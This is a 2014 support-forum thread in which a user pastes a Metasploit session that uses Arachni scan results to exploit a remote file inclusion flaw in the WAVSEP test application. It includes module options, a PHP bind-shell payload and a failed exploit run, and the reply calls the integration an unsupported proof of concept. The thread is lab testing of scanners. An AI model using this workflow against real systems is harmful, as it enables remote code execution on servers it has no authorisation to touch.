Got exception while using arachni_php_include msf plugin to exploit rfi vulnerability

Yanjin Ding

11 Jun, 2014 05:52 PM

Hi Tasos,

I ran an Arachni scan against WAVSEP (https://code.google.com/p/wavsep/), particularly the RFI section, and I got the metareport containing lots of RFI vulnerabilities. Then I loaded the metareport into Metasploit, picked one vulnerability and tried to use arachni_manual to exploit it.
But I got an exception: [-] Exploit failed: undefined method `remove_resource' for nil:NilClass. Is this a normal way of saying "cannot exploit"? Or is it an unexpected Ruby exception that needs debugging?

Below is the output I got on the terminal:

msf exploit(arachni_php_include) > arachni_manual 5
[*] Using unix/webapp/arachni_php_include .
[*] Preparing datastore for 'Remote File Inclusion' vulnerability @ 10.1.10.129/wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp ...
SRVHOST => 127.0.0.1
SRVPORT => 14471
RHOST => 10.1.10.129
RPORT => 8080
LHOST => 127.0.0.1
LPORT => 6054
SSL => false
GET => target=XXinjectionXX
METHOD => GET
COOKIES => 
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::Accept-Encoding=gzip, deflate::User-Agent=Arachni/v0.4.7::Cookie=JSESSIONID=45D7412B51830B9CB7B5950196D162EE
PATH => /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
[*] Done!
PAYLOAD => php/bind_php


msf exploit(arachni_php_include) > show options

Module options (exploit/unix/webapp/arachni_php_include):

Name     Current Setting  Required  Description
COOKIES                   no        Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
GET      target=XXinjectionXX  no  GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
HEADERS  Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::Accept-Encoding=gzip, deflate::User-Agent=Arachni/v0.4.7::Cookie=JSESSIONID=45D7412B51830B9CB7B5950196D162EE  no  Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
PATH     /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp  yes  The path to the vulnerable script.
POST                      no        POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
Proxies                   no        Use a proxy chain
RHOST    10.1.10.129      yes       The target address
RPORT    8080             yes       The target port
SRVHOST  127.0.0.1        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  14471            yes       The local port to listen on.
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)
VHOST                     no        HTTP server virtual host

Payload options (php/bind_php):

Name   Current Setting  Required  Description
LPORT  6054             yes       The listen port
RHOST  10.1.10.129      no        The target address

Exploit target:

Id  Name
0   Automatic

msf exploit(arachni_php_include) > exploit
[*] Using URL: http://127.0.0.1:14471/LiCArBFVeO
[*] PHP include server started.
[*] Started bind handler
[*] Sending HTTP request for /wavsep/active/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass

  1. Support Staff 1 Posted by Tasos Laskos on 11 Jun, 2014 05:57 PM

    Hi there,

    As the relevant file already says:

    Please be warned that at the moment Metasploit integration is here as a proof-of-concept and is not officially supported nor a high priority.
    

    Cheers

  2. Tasos Laskos closed this discussion on 11 Jun, 2014 05:57 PM.
